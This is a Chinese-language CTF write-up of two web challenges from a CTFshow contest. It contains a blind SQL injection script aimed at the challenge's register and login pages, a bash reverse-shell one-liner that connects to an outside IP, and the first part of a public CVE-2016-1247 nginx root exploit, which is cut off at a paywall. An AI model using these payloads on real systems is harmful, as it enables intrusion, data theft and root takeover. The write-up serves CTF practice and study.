CTFSHOW 内部赛web writeup
太菜了不会写,按着羽师傅和bmth666师傅的writeup复现
签到
打开界面如上,右键源码可以看到有一个register.php注册界面,需要利用login和register界面来进行sql盲注,sql太菜了连代码都看不懂,直接贴师傅们写的脚本
import requests
import re
url1 = "http://dd2ae20d-7588-4d04-af33-86ce7a48313d.challenge.ctf.show/register.php"
url2 = "http://dd2ae20d-7588-4d04-af33-86ce7a48313d.challenge.ctf.show/login.php"
flag = ''
for i in range(1, 50):
payload = "hex(hex(substr((select/**/flag/**/from/**/flag)from/**/" + str(i) + "/**/for/**/1))),/*"
print(payload)
s = requests.session()
data1 = {
'e': str(i + 30) + "',username=" + payload,
'u': "*/#",
'p': i + 30
}
# print(data1['e'])
r1 = s.post(url1, data=data1)
data2 = {
'e': i + 30,
'p': i + 30
}
r2 = s.post(url2, data=data2)
t = r2.text
real = re.findall("Hello (.*?),", t)[0]
flag += real
print(flag)
运行到异常结束
然后将得到的这行十六进制数转两次文本即可得到flag
出题人不想跟你说话.jpg
这题进去的界面是这样的
菜刀暗示了需要利用菜刀或别的工具链接后门,密码在
上
hint1: whoami && ls -l /
hint2:如你们所说,提权,看看服务器有什么服务
读取flag的权限不足
cat /etc/crontab发现有定时任务
nginx -v查看nginx的版本,可能存在提权漏洞CVE-2016-1247
受影响的版本如下:
尝试反弹shell到自己的机子上
nc -lvnp 8888 #自己的机子监听8888端口
bash -i >& /dev/tcp/xx.xx.xx.xx/8888 0>&1 #xx表示你的ip地址,公网ip
如果你的机子在阿里云或者azure需要注意修改安全组策略,不然接收不到反弹shell
上传Nginx.sh
内容为
------------[ nginxed-root.sh ]--------------
#!/bin/bash
#
# Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit
# nginxed-root.sh (ver. 1.0)
#
# CVE-2016-1247
#
# Discovered and coded by:
#
# Dawid Golunski
# dawid[at]legalhackers.com
#
# https://legalhackers.com
#
# Follow https://twitter.com/dawid_golunski for updates on this advisory.
#
# ---
# This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu
# etc.) to escalate their privileges from nginx web server user (www-data) to root
# through unsafe error log handling.
#
# The exploit waits for Nginx server to be restarted or receive a USR1 signal.
# On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx)
# script which is called daily by the cron.daily on default installations.
# The restart should take place at 6:25am which is when cron.daily executes.
# Attackers can therefore get a root shell automatically in 24h at most without any admin
# interaction just by letting the exploit run till 6:25am assuming that daily logrotation
# has been configured.
#
#
# Exploit usage:
# ./nginxed-root.sh path_to_nginx_error.log
#
# To trigger logrotation for testing the exploit, you can run the following command:
#
# /usr/sbin/logrotate -vf /etc/logrotate.d/nginx
#
# See the full advisory for details at:
# https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#
# Video PoC:
# https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
#
#
# Disclaimer:
# For testing purposes only. Do no harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nginxrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $ERRORLOG
touch $ERRORLOG
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
}
function ctrl_c() {
echo -e "\n[+] Ctrl+C pressed"
cleanexit 0
}
#intro
cat <<_eascii_
_______________________________
< Is your server (N)jinxed ? ;o >
-------------------------------
\
\ __---__
_- /--______
__--( / \ )XXXXXXXXXXX
最低0.47元/天 解锁文章
862
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
